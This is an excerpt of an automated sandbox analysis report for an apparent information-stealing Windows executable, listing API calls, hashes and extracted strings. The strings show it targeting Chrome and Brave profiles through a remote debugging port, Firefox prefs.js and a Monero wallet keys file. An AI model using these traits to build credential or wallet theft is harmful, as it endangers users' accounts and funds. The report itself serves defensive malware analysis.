                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 3334442632-1869280968
                                  • Opcode ID: 4eed5d61797cbbff0ed125ebef4da560f4a8e9b9d20caf1844bb7f1746f2e7e6
                                  • Instruction ID: f3a60d048ae39f1ef5e98e3f0eec519fbb52a531b890b252baed3dde01f0373a
                                  • Opcode Fuzzy Hash: 4eed5d61797cbbff0ed125ebef4da560f4a8e9b9d20caf1844bb7f1746f2e7e6
                                  • Instruction Fuzzy Hash: 895288B2611104EBCB24FB74DD9AEEE737DAF54310F404699B50A660D1EE385B88CF62
                                  APIs
                                  • wsprintfA.USER32 ref: 00713B1C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00713B33
                                  • lstrcat.KERNEL32(?,?), ref: 00713B85
                                  • StrCmpCA.SHLWAPI(?,00720F58), ref: 00713B97
                                  • StrCmpCA.SHLWAPI(?,00720F5C), ref: 00713BAD
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00713EB7
                                  • FindClose.KERNEL32(000000FF), ref: 00713ECC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 1125553467-2524465048
                                  • Opcode ID: 46f298eb811da2d16384f9a3c58d4561453db0b7143e787f47dfc163d71ec74b
                                  • Instruction ID: 000c0ff71eb694014164d3a0f2537f03555e56a0b0c9b90588371eeb3ee40fca
                                  • Opcode Fuzzy Hash: 46f298eb811da2d16384f9a3c58d4561453db0b7143e787f47dfc163d71ec74b
                                  • Instruction Fuzzy Hash: CDA152B1A542189BDB34DFA8DC89FEAB379AB44300F044589B61D96181EB749BC8CF61
                                  APIs
                                  • wsprintfA.USER32 ref: 00714B7C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00714B93
                                  • StrCmpCA.SHLWAPI(?,00720FC4), ref: 00714BC1
                                  • StrCmpCA.SHLWAPI(?,00720FC8), ref: 00714BD7
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00714DCD
                                  • FindClose.KERNEL32(000000FF), ref: 00714DE2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s$%s\%s$%s\*
                                  • API String ID: 180737720-445461498
                                  • Opcode ID: 28107bc982fb0f5fa405551748eaca12f9ea79435570ac938495cece0c4a7548
                                  • Instruction ID: 93802e4b824315c2ba57a976cf0db7eef3f203c3dee6cc3e3eb12672d9442c9e
                                  • Opcode Fuzzy Hash: 28107bc982fb0f5fa405551748eaca12f9ea79435570ac938495cece0c4a7548
                                  • Instruction Fuzzy Hash: 356169B1554118ABCB20EBE4ED49FEAB37CBB48701F004689F60996181FB749BC4CFA1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 007147D0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007147D7
                                  • wsprintfA.USER32 ref: 007147F6
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0071480D
                                  • StrCmpCA.SHLWAPI(?,00720FAC), ref: 0071483B
                                  • StrCmpCA.SHLWAPI(?,00720FB0), ref: 00714851
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 007148DB
                                  • FindClose.KERNEL32(000000FF), ref: 007148F0
                                  • lstrcat.KERNEL32(?,011DE880), ref: 00714915
                                  • lstrcat.KERNEL32(?,011DD848), ref: 00714928
                                  • lstrlen.KERNEL32(?), ref: 00714935
                                  • lstrlen.KERNEL32(?), ref: 00714946
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 671575355-2848263008
                                  • Opcode ID: 66aa39627246daf70b4cf443dcfa12bbd78e0b932ebb8738b99ff3e2f31ee98a
                                  • Instruction ID: ee79c8f45bdc7470972aee743174a08b86eb28ffbb1ffc2f4158d4c049b323ac
                                  • Opcode Fuzzy Hash: 66aa39627246daf70b4cf443dcfa12bbd78e0b932ebb8738b99ff3e2f31ee98a
                                  • Instruction Fuzzy Hash: 6B51ACB1558218ABCB20EBB4DC59FEDB37CAB58300F404689B659960D0EB74DBC4DF91
                                  APIs
                                  • wsprintfA.USER32 ref: 00714113
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0071412A
                                  • StrCmpCA.SHLWAPI(?,00720F94), ref: 00714158
                                  • StrCmpCA.SHLWAPI(?,00720F98), ref: 0071416E
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 007142BC
                                  • FindClose.KERNEL32(000000FF), ref: 007142D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 180737720-4073750446
                                  • Opcode ID: ae125592b8d726711790ca0524b51cc484cc7df92cd84233c607fa613005d72d
                                  • Instruction ID: 2e7f5ef70ed3fe1c971060074078ae0f3a7c40c70304a5cd39dbcf7c495b56ad
                                  • Opcode Fuzzy Hash: ae125592b8d726711790ca0524b51cc484cc7df92cd84233c607fa613005d72d
                                  • Instruction Fuzzy Hash: 595199B1554118EBCB24EBB4DD49EEAB37CBB48300F4046C9B61996090EB74ABC5DF90
                                  APIs
                                  • wsprintfA.USER32 ref: 0070EE3E
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0070EE55
                                  • StrCmpCA.SHLWAPI(?,00721630), ref: 0070EEAB
                                  • StrCmpCA.SHLWAPI(?,00721634), ref: 0070EEC1
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0070F3AE
                                  • FindClose.KERNEL32(000000FF), ref: 0070F3C3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 180737720-1013718255
                                  • Opcode ID: e6afd0c00de49ddd78f828498902a5e8dcb3f4f3c3e2c94339dbf97d037c6af4
                                  • Instruction ID: e695045663102bf36dcd1a3ef03d9858fdaab471a21d59026e575401aec77c60
                                  • Opcode Fuzzy Hash: e6afd0c00de49ddd78f828498902a5e8dcb3f4f3c3e2c94339dbf97d037c6af4
                                  • Instruction Fuzzy Hash: 4DE125B1916118EADB24FB64DC66EEE733DAF54310F4045D9B40A620D2EE386BC9CF61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                  • API String ID: 0-1562099544
                                  • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                  • Instruction ID: cf934d431d458055dc0d692c7079a176ca74b8e1c64f2b9da4c3666c06620493
                                  • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                  • Instruction Fuzzy Hash: 37E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007216B0,00720D97), ref: 0070F81E
                                  • StrCmpCA.SHLWAPI(?,007216B4), ref: 0070F86F
                                  • StrCmpCA.SHLWAPI(?,007216B8), ref: 0070F885
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0070FBB1
                                  • FindClose.KERNEL32(000000FF), ref: 0070FBC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 3334442632-3783873740
                                  • Opcode ID: b35ff102e66f5b428cf71ca0cb4fdc1fddddddbede8996ad1bc92ec1272e6006
                                  • Instruction ID: e2124e6b79c661193b5a4460fa08ab474da88afbd20db963cf0bda2d97e761b9
                                  • Opcode Fuzzy Hash: b35ff102e66f5b428cf71ca0cb4fdc1fddddddbede8996ad1bc92ec1272e6006
                                  • Instruction Fuzzy Hash: 08B16471A15118EBCB24EF64DC5AEED7379AF54300F0086A8E40A561D1EF386B88CF91
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0072523C,?,?,?,007252E4,?,?,00000000,?,00000000), ref: 00701963
                                  • StrCmpCA.SHLWAPI(?,0072538C), ref: 007019B3
                                  • StrCmpCA.SHLWAPI(?,00725434), ref: 007019C9
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00701D80
                                  • DeleteFileA.KERNEL32(00000000), ref: 00701E0A
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00701E60
                                  • FindClose.KERNEL32(000000FF), ref: 00701E72
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 1415058207-1173974218
                                  • Opcode ID: 59c17615ab8ef3d109db598d939b7536ff1bf27dfe6f511b07cf2015c3768bdd
                                  • Instruction ID: f626a0b8b606d054846b27970a96733a52d33e03873368552d5c28367ab57c51
                                  • Opcode Fuzzy Hash: 59c17615ab8ef3d109db598d939b7536ff1bf27dfe6f511b07cf2015c3768bdd
                                  • Instruction Fuzzy Hash: 191212B1A15118EBCB25FB64DC6AAEE7379AF54310F4045D9B106620D1EF386BC8CFA1
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00720C32), ref: 0070DF5E
                                  • StrCmpCA.SHLWAPI(?,007215C0), ref: 0070DFAE
                                  • StrCmpCA.SHLWAPI(?,007215C4), ref: 0070DFC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0070E4E0
                                  • FindClose.KERNEL32(000000FF), ref: 0070E4F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
